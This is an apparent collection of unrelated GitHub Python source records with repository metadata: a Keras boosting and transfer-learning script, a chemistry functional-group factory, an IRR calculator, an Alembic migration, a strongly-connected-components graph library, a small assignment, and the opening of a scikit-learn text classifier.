np.load(open('bottleneck_features_val.npy',\"rb\"))\n\n\t\ttest_data = np.load(open('bottleneck_features_val.npy',\"rb\"))\n\n\t\ttrain_labels,validation_labels,test_labels = train_generator.classes[:trainNum],validation_generator.classes[:valNum],test_generator.classes[:testNum]\n\n\t\tearlystop = EarlyStopping(monitor='val_acc', min_delta=0.0001, patience=5, verbose=1, mode='auto')\n\n\t\tcheckpoint = ModelCheckpoint(path_to_best_model, monitor='val_loss', verbose=1, save_best_only=True, period=1,mode='max')\n\n\t\ttop_model.fit(train_data, train_labels,\n\t\t\t\t epochs=epochs,\n\t\t\t\t batch_size=batch_size,\n\t\t\t\t validation_data=(validation_data, validation_labels),\n\t\t\t\t callbacks = [earlystop,checkpoint],\n\t\t\t\t shuffle = True)\n\n\t\tprint(top_model.evaluate(test_data, test_labels, verbose=1))\n\ndef full_model_builder(path_to_best_top_model,bottom_model,top_model,lr):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\ttop_model.load_weights(path_to_best_top_model)\n\tfull_model = Model(inputs= bottom_model.input, outputs= top_model(bottom_model.output))\n\tfull_model.compile(optimizer = optimizers.Adam(lr=lr,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n\tfor layer in full_model.layers:\n\t\tlayer.trainable = False\n\treturn full_model\n\n\n\n############################################################################\n# TRAINING FIRST LAYERS #\n############################################################################\n\ndef first_layers_modified_model_builder(model,layerLimit,reinitialize_bottom_layers ):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\n\tthis function changes a model whose first layers are trainable with reinitialized weights\n\tINPUTS :\n\t- model to modifiy\n\t- layerLimit : limit of the first layer to modify (see layer.name)\n\tOUTPUTS :\n\t- copy of the modified model\n\t\"\"\"\n\tmodel_copy = cp.deepcopy(model)\n\tfor layer in model_copy.layers[:layerLimit]:\n\n\t\tsession = k.get_session()\n\t\tlayer.trainable = True\n\t\tif reinitialize_bottom_layers :\n\t\t\tfor v in layer.__dict__:\n\t\t\t\tv_arg = getattr(layer,v)\n\t\t\t\tif hasattr(v_arg,'initializer'):\n\t\t\t\t\tinitializer_method = getattr(v_arg, 'initializer')\n\t\t\t\t\tinitializer_method.run(session=session)\n\t\t\t\t\tprint('reinitializing layer {}.{}'.format(layer.name, v))\n\n\tfor layer in model_copy.layers[layerLimit:]:\n\t\tlayer.trainable = False\n\n\treturn model_copy\n\ndef first_layers_modified_model_trainer(model,train_generator,validation_generator,test_generator,epochs,threshold):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\tthis function trains models from [first_layers_modified_model_builder] function\n\t\"\"\"\n\tmodel.fit_generator(train_generator, epochs=epochs, verbose=1, callbacks=[callbackBoosting(threshold,\"val_acc\")], validation_data=validation_generator, use_multiprocessing=False, shuffle=True)\n\tscore = model.evaluate_generator(test_generator)\n\tprint(\"projector score : \", score)\n\ndef small_net_builder(originalSize,resizeFactor,lr):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\tif k.image_data_format() == 'channels_first':\n\t\tinput_shape = (3, img_size, img_size)\n\telse:\n\t\tinput_shape = (img_size, img_size, 3)\n\n\tmodel = Sequential()\n\tmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\tmodel.add(Conv2D(32, (3, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\tmodel.add(Conv2D(64, (3, 3)))\n\tmodel.add(Activation('relu'))\n\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\tmodel.add(Flatten())\n\tmodel.add(Dense(64))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(34))\n\tmodel.add(Activation('relu'))\n\tmodel.add(Dropout(0.5))\n\tmodel.add(Dense(1))\n\tmodel.add(Activation('sigmoid'))\n\n\tmodel.compile(optimizer = optimizers.Adam(lr=lr,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n\n\treturn model\n\ndef from_generator_to_array(classes,path_to_train,path_to_validation,originalSize,resizeFactor,transformation_ratio,trainNum,valNum,testNum):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\timg_size = originalSize*resizeFactor\n\n\ttrain_datagen = ImageDataGenerator(rescale=1. / 255,\n\t\t\t\t\t\t\t\t\t rotation_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t shear_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t zoom_range=transformation_ratio,\n\t\t\t\t\t\t\t\t\t cval=transformation_ratio,\n\t\t\t\t\t\t\t\t\t horizontal_flip=True,\n\t\t\t\t\t\t\t\t\t vertical_flip=True)\n\n\tvalidation_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\ttest_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\ttrain_generator = train_datagen.flow_from_directory(path_to_train,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tbatch_size=trainNum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclasses = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tclass_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tshuffle = False)\n\n\tvalidation_generator = validation_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t batch_size=valNum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t shuffle = False)\n\n\ttest_generator = test_datagen.flow_from_directory(path_to_validation,target_size=(img_size, img_size),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t classes = classes,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t batch_size=testNum,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t class_mode='binary',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t shuffle = False)\n\tx_train,y_train = train_generator.next()\n\tx_val,y_val = validation_generator.next()\n\tx_test,y_test = test_generator.next()\n\n\treturn x_train,y_train,x_val,y_val,x_test,y_test\n\n\n#######################################################\n# BOOSTING #\n#######################################################\ndef take(tab,indexes):\n\toutput = np.zeros(tab.shape)\n\n\tc=0\n\tfor i in indexes:\n\t\toutput[c] = tab[i]\n\t\tc+=1\n\treturn output\n\n# def booster(full_model,times,x_train,y_train_bin,epochs,threshold,layerLimit,**kwargs):\ndef booster(full_model,x_train,y_train,x_val,y_val,epochs,threshold,layerLimit,times,bigNet,originalSize,resizeFactor,lr,proba_threshold):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\ttrain_length = len(x_train)\n\tmodel_list = []\n\terror_list = []\n\talpha_list = []\n\tc = 1\n\n\tif train_length==0:\n\t\traise NameError(\"length of training set equals 0\")\n\n\tprob = np.repeat(1/train_length, train_length)\n\tindexes = list(range(train_length))\n\n\tfor time in range(times):\n\n\t\tcurrent_model_path = os.path.join(models_path,\"model_\"+str(c)+\"h5\")\n\n\t\ttrain_boost_indexes = np.random.choice(indexes,p=prob,size=train_length,replace=True)\n\t\tx_train_boost = take(x_train,train_boost_indexes)\n\t\ty_train_boost = take(y_train,train_boost_indexes)\n\n\t\tif bigNet :\n\t\t\tcurrent_model = first_layers_modified_model_builder(full_model,layerLimit)\n\t\telse :\n\t\t\tcurrent_model = small_net_builder(originalSize,resizeFactor,lr)\n\n\t\terror = 0\n\t\twhile error == 1 or error == 0 :\n\t\t\tif bigNet :\n\t\t\t\tcurrent_model = first_layers_modified_model_builder(full_model,layerLimit)\n\t\t\telse:\n\t\t\t\tcurrent_model = small_net_builder(originalSize,resizeFactor,lr)\n\n\t\t\tcurrent_model.fit(x_train_boost, y_train_boost, epochs=epochs, verbose=1, callbacks=[callbackBoosting(threshold,\"acc\")], shuffle=True)\n\n\t\t\terror = 1 - current_model.evaluate(x_val, y_val, verbose=1)[1]\n\t\talpha = .5*np.log((1-error)/error)\n\n\t\terror_list.append(error)\n\t\t# model_list.append(current_model)\n\n\t\tmodel_list.append(current_model_path) #adds model path to list\n\t\tcurrent_model.save(current_model_path) #saves model to disk\n \n\t\talpha_list.append(alpha)\n\n\t\tpredicted_probs = current_model.predict(x_train)\n\t\tpredicted_classes = []\n\t\tdel current_model #frees up memory space\n\n\n\t\tfor predicted_prob in predicted_probs:\n\t\t\tif predicted_prob >= proba_threshold:\n\t\t\t\tpredicted_classes.append(1)\n\t\t\telse :\n\t\t\t\tpredicted_classes.append(0)\n\n\t\tfor i in range(len(predicted_classes)):\n\t\t\tif predicted_classes[i] == y_train[i]:\n\t\t\t\tprob[i] = prob[i]*np.exp(-alpha)\n\t\t\telse:\n\t\t\t\tprob[i] = prob[i]*np.exp(alpha)\n\t\tprob = prob / np.sum(prob)\n\n\treturn model_list, error_list, alpha_list\n\ndef prediction_boosting(x,model_list, alpha_list,proba_threshold):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tn_samples = len(x)\n\tn_models = len(model_list)\n\tresults = []\n\tpredicted_class_list = []\n\tc = 0\n\tfor model_name in model_list:\n\t\tprint(\"beginning prediction for model :\",c)\n\n\t\tmodel = load_model(model_name) #loads model from disk\n\t\tprobas = np.array(model.predict(x))\n\t\tbooleans = probas >= proba_threshold\n\t\tbooleans = list(chain(*booleans))\n\t\tto_append = []\n\t\tfor boolean in booleans:\n\t\t\tif boolean:\n\t\t\t\tto_append.append(1)\n\t\t\telse:\n\t\t\t\tto_append.append(-1)\n\t\tpredicted_class_list.append(to_append)\n\t\tprint(\"ending prediction for model :\",c)\n\t\tc +=1\n\n\tpredicted_class_list = np.array(predicted_class_list)\n\tpredicted_class_list.reshape((n_models,n_samples))\n\tpredicted_class_list = np.transpose(predicted_class_list)\n\talpha_list = np.array(alpha_list)\n\traw_results = np.dot(predicted_class_list,alpha_list)\n\n\tfor raw_result in raw_results:\n\t\tif raw_result >=0:\n\t\t\tresults.append(1)\n\t\telse:\n\t\t\tresults.append(0)\n\treturn results\n\ndef accuracy(y_true,y_pred):\n\t\"\"\"\n\tromain.gautron@agroparistech.fr\n\t\"\"\"\n\tif isinstance(y_true,np.ndarray):\n\t\ty_true = y_true.tolist()\n\tif isinstance(y_pred,np.ndarray):\n\t\ty_pred = y_pred.tolist()\n\tbool_res = []\n\tfor i in range(len(y_true)):\n\t\tbool_res.append(y_true[i] == y_pred[i])\n\tint_res = list(map(int,bool_res))\n\taccuracy = np.sum(int_res)/len(y_true)\n\treturn accuracy\n\ndef main():\n\t\"\"\" this function stands for testing purposes\n\t\"\"\"\n\tclasses_source = ['dog','truck']\n\tclasses_target = ['deer','horse']\n\tnum_of_classes = len(classes_source)\n\n\tbatch_size_source = 10\n\ttransformation_ratio = .05\n\toriginalSize = 32\n\tresizeFactor = 5\n\tpath_to_train = path + \"train\"\n\tpath_to_validation = path + \"validation\"\n\tpath_to_test = path + \"test\"\n\n\tpath_to_best_top_model = \"best_top_model.hdf5\"\n\n\ttrainNum_source = 7950\n\tvalNum_source = 2040\n\ttestNum_source = 2040\n\ttrainNum_target = 8010\n\tvalNum_target = 1980\n\ttestNum_target = 1980\n\n\tlr_source = 0.0001\n\tepochs_source = 50\n\n\trecompute_transfer_values = False\n\ttrain_top_model = False\n\n\tbottom_model = bottom_layers_builder(originalSize,resizeFactor)\n\ttrain_generator_source,validation_generator_source,test_generator_source = create_generators(classes_source,path_to_train,path_to_validation,originalSize,resizeFactor,batch_size_source,transformation_ratio)\n\tpstest = pd.Series(test_generator_source.classes[:testNum_source])\n\tcounts = pstest.value_counts()\n\tprint(\"test classes \",counts)\n\tpstrain = pd.Series(train_generator_source.classes[:trainNum_source])\n\tcounts = pstrain.value_counts()\n\tprint(\"train classes \",counts)\n\tsave_bottleneck_features(bottom_model,train_generator_source,validation_generator_source,test_generator_source,trainNum_source,valNum_source,testNum_source,batch_size_source,recompute_transfer_values)\n\ttop_model = top_layer_builder(lr_source,num_of_classes)\n\ttop_layer_trainer(train_top_model,top_model,epochs_source,batch_size_source,trainNum_source,valNum_source,testNum_source,lr_source,train_generator_source,validation_generator_source,test_generator_source,path_to_best_top_model)\n\ttop_model_init = top_layer_builder(lr_source,num_of_classes)\n\tfull_model = full_model_builder(path_to_best_top_model,bottom_model,top_model_init,lr_source)\n\t# full_model_score = full_model.evaluate_generator(test_generator_source)\n\t# print(full_model_score)\n\n\tlayerLimit = 15\n\tepochs_target = 100\n\tlr_target = 0.0001\n\tbatch_size_target = 10\n\tthreshold = .65\n\treinitialize_bottom_layers = False\n\tbigNet = False\n\ttimes = 100\n\n\t# train_generator_target,validation_generator_target,test_generator_target = create_generators(classes_target,path_to_train,path_to_validation,originalSize,resizeFactor,batch_size_target,transformation_ratio)\n\t# first_layers_modified_model = first_layers_modified_model_builder(full_model,layerLimit,reinitialize_bottom_layers)\n\t# first_layers_modified_model_score = first_layers_modified_model.evaluate_generator(test_generator_target)\n\t# print(first_layers_modified_model_score)\n\t# first_layers_modified_model_trainer(first_layers_modified_model,train_generator_target,validation_generator_target,test_generator_target,epochs_target,threshold)\n\n\t# small_net_builder= small_net_builder(originalSize,resizeFactor,lr)\n\t# first_layers_modified_model_trainer(small_net_builder,train_generator_target,validation_generator_target,test_generator_target,epochs_target,threshold)\n\n\tproba_threshold = .5\n\tx_train_target,y_train_target,x_val_target,y_val_target,x_test_target,y_test_target = from_generator_to_array(classes_target,path_to_train,path_to_validation,originalSize,resizeFactor,transformation_ratio,trainNum_target,valNum_target,testNum_target)\n\tmodel_list, error_list, alpha_list = booster(full_model,x_train_target,y_train_target,x_val_target,y_val_target,epochs_target,threshold,layerLimit,times,bigNet,originalSize,resizeFactor,lr_target,proba_threshold)\n\t# pickler = pickle.Pickler(open('alpha_list.pkl', 'wb'), -1)\n\t# pickler.dump(alpha_list)\n\t# print(model_list, error_list, alpha_list)\n\t# c = 0\n\t# for model in model_list:\n\t# \tmodel_path = \"model\"+ str(c) +\".h5\"\n\t# \tmodel.save(model_path)\n\t# \tc+=1\n\tpredicted_classes = prediction_boosting(x_test_target,model_list, alpha_list,proba_threshold)\n\t# np.save(open('boosting_classes.npy', 'wb'), predicted_classes)\n\tprint(accuracy(y_test_target,predicted_classes))\n\n\t# model_list = []\n\t# for time in range(times):\n\t# \tpath_model = \"model\"+ str(time) +\".h5\"\n\t# \tmodel = load_model(path_model)\n\t# \tmodel_list.append(model)\n\t# with open('result_list.pkl', 'rb') as pickle_file:\n\t# \talpha_list = pickle.load(pickle_file)\n\n\t# predicted_classes = prediction_boosting(x_test_target,model_list, alpha_list,proba_threshold)\n\tprint(accuracy(y_test_target,predicted_classes))\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"romaingautron/transboost","sub_path":"kerasImplementation/boosting.py","file_name":"boosting.py","file_ext":"py","file_size_in_byte":19359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14431719116","text":"\"\"\"\nThioacid Factory\n================\n\n\"\"\"\n\n\nfrom stk._internal.functional_group_factories.functional_group_factory import (\n FunctionalGroupFactory,\n)\nfrom stk._internal.functional_group_factories.utilities import get_atom_ids\nfrom stk._internal.functional_groups.thioacid import Thioacid\n\n\nclass ThioacidFactory(FunctionalGroupFactory):\n \"\"\"\n Creates :class:`.Thioacid` instances.\n\n Creates functional groups from substructures, which match the\n ``[*][C](=[O])[S][H]`` functional group string.\n\n Examples\n --------\n *Creating Functional Groups with the Factory*\n\n You want to create a building block which has :class:`.Thioacid`\n functional groups. You want the carbon atom in those functional\n groups to be the *bonder* atom, and SH group to be the *deleter*\n atoms.\n\n .. testcode:: creating-functional-groups-with-the-factory\n\n import stk\n\n building_block = stk.BuildingBlock(\n smiles='SC(=O)CC(=O)S',\n functional_groups=(stk.ThioacidFactory(), ),\n )\n\n .. testcode:: creating-functional-groups-with-the-factory\n :hide:\n\n assert all(\n isinstance(functional_group, stk.Thioacid)\n for functional_group\n in building_block.get_functional_groups()\n )\n assert building_block.get_num_functional_groups() == 2\n\n *Changing the Bonder and Deleter Atoms*\n\n You want to create a building block which has :class:`.Thioacid`\n functional groups. You want the carbon atom to be the *bonder*\n atom and the oxygen atom to be the *deleter* atom.\n\n .. testcode:: changing-the-bonder-and-deleter-atoms\n\n import stk\n\n thioacid_factory = stk.ThioacidFactory(\n # The index of the carbon atom in the functional\n # group string (see docstring) is 1.\n bonders=(1, ),\n # The index of the oxygen atom in the functional\n # group string (see docstring) is 2.\n deleters=(2, ),\n )\n building_block = stk.BuildingBlock(\n smiles='SC(=O)CC(=O)S',\n functional_groups=(thioacid_factory, ),\n )\n\n .. testcode:: changing-the-bonder-and-deleter-atoms\n :hide:\n\n fg1, fg2 = building_block.get_functional_groups()\n assert fg1.get_num_bonders() == 1\n assert sum(1 for _ in fg1.get_deleters()) == 1\n assert fg2.get_num_bonders() == 1\n assert sum(1 for _ in fg2.get_deleters()) == 1\n\n assert all(\n isinstance(atom, stk.C)\n for functional_group\n in building_block.get_functional_groups()\n for atom\n in functional_group.get_bonders()\n )\n assert all(\n isinstance(atom, stk.O)\n for functional_group\n in building_block.get_functional_groups()\n for atom\n in functional_group.get_deleters()\n )\n\n See Also\n --------\n :class:`.GenericFunctionalGroup`\n Defines *bonders* and *deleters*.\n\n \"\"\"\n\n def __init__(self, bonders=(1,), deleters=(3, 4), placers=None):\n \"\"\"\n Initialize a :class:`.ThioacidFactory` instance.\n\n Parameters\n ----------\n bonders : :class:`tuple` of :class:`int`\n The indices of atoms in the functional group string, which\n are *bonder* atoms.\n\n deleters : :class:`tuple` of :class:`int`\n The indices of atoms in the functional group string, which\n are *deleter* atoms.\n\n \"\"\"\n\n self._bonders = bonders\n self._deleters = deleters\n self._placers = bonders if placers is None else placers\n\n def get_functional_groups(self, molecule):\n for atom_ids in get_atom_ids(\"[*][C](=[O])[S][H]\", molecule):\n atoms = tuple(molecule.get_atoms(atom_ids))\n yield Thioacid(\n carbon=atoms[1],\n oxygen=atoms[2],\n sulfur=atoms[3],\n hydrogen=atoms[4],\n atom=atoms[0],\n bonders=tuple(atoms[i] for i in self._bonders),\n deleters=tuple(atoms[i] for i in self._deleters),\n placers=tuple(atoms[i] for i in self._placers),\n )\n","repo_name":"lukasturcani/stk","sub_path":"src/stk/_internal/functional_group_factories/thioacid_factory.py","file_name":"thioacid_factory.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"40"} +{"seq_id":"8720381137","text":"from dataclasses import dataclass\nimport datetime\nimport math\n\n@dataclass(frozen=True)\nclass Payment:\n Date: datetime.datetime\n Sum: float\n\n# https://www.youtube.com/watch?v=9_Lj1CSbAh0&t=497s\ndef arsageraRate(payments: list[Payment]):\n payments = sorted(payments, key=lambda x: x.Date)\n minDate = payments[0].Date\n maxDate = payments[-1].Date\n totalYears = yearsBetween(minDate, maxDate)\n\n workingAmount=0.0\n workingSum=0.0\n totalPnL=0.0\n for i, item in enumerate(payments):\n current = item.Sum\n totalPnL += current\n if i < len(payments)-1:\n workingSum -= current\n if workingSum > 0:\n weight = yearsBetween(item.Date, payments[i+1].Date) / totalYears\n workingAmount += workingSum * weight\n\n rate = 1+totalPnL/workingAmount\n annualRate = rate ** (1.0/totalYears)\n return rate, annualRate\n\ndef yearsBetween(minDate, maxDate):\n return (maxDate-minDate).days/365.25\n\n@dataclass(frozen=True)\nclass Cashflow:\n Years: float\n Sum: float\n\ndef _convertToCashflows(payments: list[Payment]):\n minDate = min(payments, key= lambda x: x.Date).Date\n return [Cashflow(yearsBetween(minDate, x.Date), x.Sum) for x in payments]\n\ndef irr(payments):\n return _calculateXirr(_convertToCashflows(payments), 0.01, 1000000, 0.0001)\n\ndef _calculateXirr(cashFlows, lowRate, highRate, precision):\n lowResult = _calcEquation(cashFlows, lowRate)\n highResult = _calcEquation(cashFlows, highRate)\n while True:\n if math.copysign(1.0, lowResult)==math.copysign(1.0, highResult):\n return None\n \n middleRate = 0.5 * (lowRate + highRate)\n middleResult = _calcEquation(cashFlows, middleRate)\n if abs(middleResult) <= precision:\n return middleRate\n\n if math.copysign(1.0, middleResult) == math.copysign(1.0, lowResult):\n lowRate = middleRate\n lowResult = middleResult\n else:\n highRate = middleRate\n highResult = middleResult\n\n\ndef _calcEquation(cashflows, rate):\n return sum(x.Sum * pow(rate, -x.Years) for x in cashflows)\n","repo_name":"ChizhovVadim/assetsdev","sub_path":"internal/xirr.py","file_name":"xirr.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19689197615","text":"\"\"\"empty message\n\nRevision ID: 3b92ecf22681\nRevises: 3cb7bd044853\nCreate Date: 2015-08-03 11:30:03.522336\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3b92ecf22681'\ndown_revision = '3cb7bd044853'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('users', 'email',\n existing_type=mysql.VARCHAR(length=64),\n nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.alter_column('users', 'email',\n existing_type=mysql.VARCHAR(length=64),\n nullable=False)\n ### end Alembic commands ###\n","repo_name":"sggaffney/pathscore","sub_path":"migrations/versions/3b92ecf22681_.py","file_name":"3b92ecf22681_.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"2618390517","text":"# -*- coding:utf-8 -*-\nfrom helpers.phLogging import PhLogging\nfrom helpers.singleton import singleton\nimport json\nfrom config.projectDataConfig import project_default_conf\nimport re\nfrom functools import reduce\n\n\n@singleton\nclass PhAppConfig(object):\n condi = []\n\n def __init__(self):\n self.conf = {}\n self.queryDefinedSchemas()\n\n def getConf(self):\n return self.conf\n\n def queryDefinedSchemas(self):\n # Bug: windows 可能出现的编码问题,现在把所有的文件读取全部去掉\n # f = open('./config/projectDataConfig.json', encoding='utf-8')\n # tmp = json.loads(f.read(4096))\n tmp = project_default_conf\n self.conf['defined_schema'] = tmp['schema']\n self.conf['condi_schema'] = tmp['condi_schema']\n self.conf['condi_schema_local'] = tmp['condi_schema_local']\n self.conf['trans_schema'] = tmp['trans_schema']\n self.conf['table'] = tmp['table']\n self.conf['count_condi'] = tmp['count_condi']\n self.conf['can_change_cols'] = tmp['can_change_cols']\n self.conf['non_null_cols'] = tmp['non_null_cols']\n self.conf['qc_can_change_cols'] = tmp['qc_can_change_cols']\n\n def configClear(self):\n self.condi = []\n self.conf = {}\n\n def isAdmin(self):\n return self.getConf()['scope'] == '*'\n\n def isTmpUser(self):\n return not self.isAdmin()\n\n def filterEmpty(self, lst):\n return list(filter(lambda x: x != '', lst))\n\n def condi2IndexRange(self, condi):\n regex = r\"\\d+\"\n matches = re.finditer(regex, condi, re.MULTILINE)\n result = []\n for matchNum, match in enumerate(matches, start=1):\n result.append(int(match.group()))\n\n if len(result) > 1:\n return min(result), max(result)\n elif len(result) == 1:\n return min(result), -1\n else:\n return -1, -1\n\n def IndexRange2Condi(self, min, max):\n result = []\n if min >= 0:\n result.append('Index >= ' + str(min))\n\n if max >= 0:\n result.append('Index < ' + str(max))\n\n if len(result) > 0:\n return ' and '.join(result)\n else:\n return 'Index == -1'\n\n def findMaxRequestIndex(self):\n all_indices = list(map(lambda x: list(self.condi2IndexRange(x[2])), self.condi))\n all_indices = reduce(lambda x, y: x + y, all_indices)\n return max(all_indices)\n","repo_name":"PharbersDeveloper/hosp_mapping","sub_path":"helpers/appConfig.py","file_name":"appConfig.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9979069715","text":"#name#\n# 強連結成分分解\n#description#\n# 強連結成分分解(SCC): グラフgに対するSCCを行う\n#body#\nclass SCCGraph:\n def __init__(self, N):\n self.N = N\n self.edges = []\n self.ef, self.er = [[] for _ in range(N)], [[] for _ in range(N)]\n\n def add_edge(self, v, w):\n self.edges.append((v, w))\n self.ef[v].append(w)\n self.er[w].append(v)\n\n def scc_group(self):\n N = self.N\n group = [None] * N\n visited = [False] * N\n order = []\n for x in range(N):\n if visited[x]: continue\n stack = [x]\n visited[x] = True\n while stack:\n y = stack.pop()\n movable = False\n for ny in self.ef[y]:\n if visited[ny]: continue\n movable = True\n visited[ny] = True\n stack.append(y)\n stack.append(ny)\n break\n if not movable: order.append(y)\n visited = [False] * N\n count = 0\n for x in order[::-1]:\n if visited[x]: continue\n stack = [x]\n group[x] = count\n while stack:\n y = stack.pop()\n visited[y] = 1\n for ny in self.er[y]:\n if visited[ny]: continue\n group[ny] = count\n stack.append(ny)\n count += 1\n return count, group\n\n def scc(self):\n count, group = self.scc_group()\n groups = [[] for _ in range(count)]\n for i, x in enumerate(group):\n groups[x].append(i)\n return groups\n\n####################################\n\nn, m = map(int, input().split())\nscc = SCCGraph(n)\n\nfor i in range(m):\n _a, _b = map(int, input().split())\n# _a -= 1; _b -= 1\n scc.add_edge(_a, _b)\n\n_, gr = scc.scc_group()\nfor _ in range(int(input())):\n u, v = map(int, input().split())\n print(int(gr[u] == gr[v]))\n\n# print(scc.scc_group())\n#(3,_[0,_1,_1,_1,_2])\n# print(scc.scc())\n#[[0],_[1,_2,_3],_[4]]\n\n# 強連結成分分解(SCC): グラフgに対するSCCを行う\n# https://hkawabata.github.io/technical-note/note/Algorithm/graph/scc.html\n# 有向グラフで、互いに行き来できる連結成分を分類する\n# 元の有向グラフが DAG でなくとも、そのグラフの SCC は DAG を形成する\n# 作り方\n# 適当に選んだ頂点から深さ優先(帰りがけ探索)し、1から番号を増やしながらラベリング:\n# エッジをすべて逆向きにしたグラフを用意:\n# 頂点のうち、ラベル番号が最大のものを選んでグラフ探索 → 通った頂点はすべて1つの SCC に属する:\n# 未探索の頂点のうち、ラベル番号が最大のものを選んでグラフ探索 → 通った頂点はすべて1つの SCC に属する:\n\n# https://atcoder.jp/contests/practice2/tasks/practice2_g\n\n#prefix#\n# Lib_GD_強連結成分分解_SCC\n#end#\n","repo_name":"ibtosmlin/atcoder","sub_path":"lib/lib/Lib_GD_強連結成分分解.py","file_name":"Lib_GD_強連結成分分解.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9914550000","text":"'''Assignment 7 question 1 No Repeats\r\nAdam Smith\r\n27 April 2014'''\r\n\r\nStrings = [] #creates list to store names of strings\r\nStrings = [input(\"Enter strings (end with DONE):\\n\")]\r\n\r\nwhile \"DONE\" not in Strings: \r\n UserInput = input()\r\n if UserInput == \"DONE\": #breaks the loop if the user inputs DONE\r\n break\r\n \r\n elif UserInput not in Strings: #if the string does not exist add it to the list\r\n Strings.append(UserInput)\r\n\r\nprint()\r\nprint(\"Unique list:\")\r\nfor output in Strings: #outputs the list\r\n if output!= \"DONE\":\r\n \r\n print(output)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_7/smtada002/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32256353069","text":"from __future__ import print_function\n\nimport logging\nimport numpy as np\nfrom optparse import OptionParser\nimport sys\nfrom time import time\nimport matplotlib.pyplot as plt\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.feature_extraction.text import HashingVectorizer\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.linear_model import RidgeClassifier\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.naive_bayes import BernoulliNB, MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.neighbors import NearestCentroid\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.utils.extmath import density\nfrom sklearn import metrics\nfrom sklearn.utils import shuffle\n\n\n\nuseTFIDF = True\nshowSampleVector = False\nshowMostInformativeFeatures = True\nhowManyInformativeFeatures = 10\nnGRAM1 = 10\nnGRAM2 = 10\nweight = 10\n\nask = input(\"Do you want to specify parameters or use default values? Input 'T' or 'F'. \")\nif ask == \"T\":\n useTFIDFStr = input(\"Do you want to use tfidfVectorizer or CountVectorizer? Type T for tfidfVectorizer and F for CountVectorizer \")\n if useTFIDFStr == \"T\":\n useTFIDF = True\n else:\n useTFIDF = False\n\n showSampleVectorStr = input(\"Do you want to print an example vectorized corpus? (T/F) \")\n if showSampleVectorStr == \"T\":\n showSampleVector = True\n else:\n showSampleVector = False\n\n showMostInformativeFeaturesStr = input(\"Do you want to print the most informative feature in some of the classifiers? (T/F) \")\n if showMostInformativeFeaturesStr == \"T\":\n showMostInformativeFeatures = True\n howManyInformativeFeatures = int(input(\"How many of these informative features do you want to print for each binary case? Input a number \"))\n else:\n showMostInformativeFeatures = False\n\n nGRAM1 = int(input(\"N-Gram lower bound (Read README.md for more information)? Input a number \"))\n nGRAM2 = 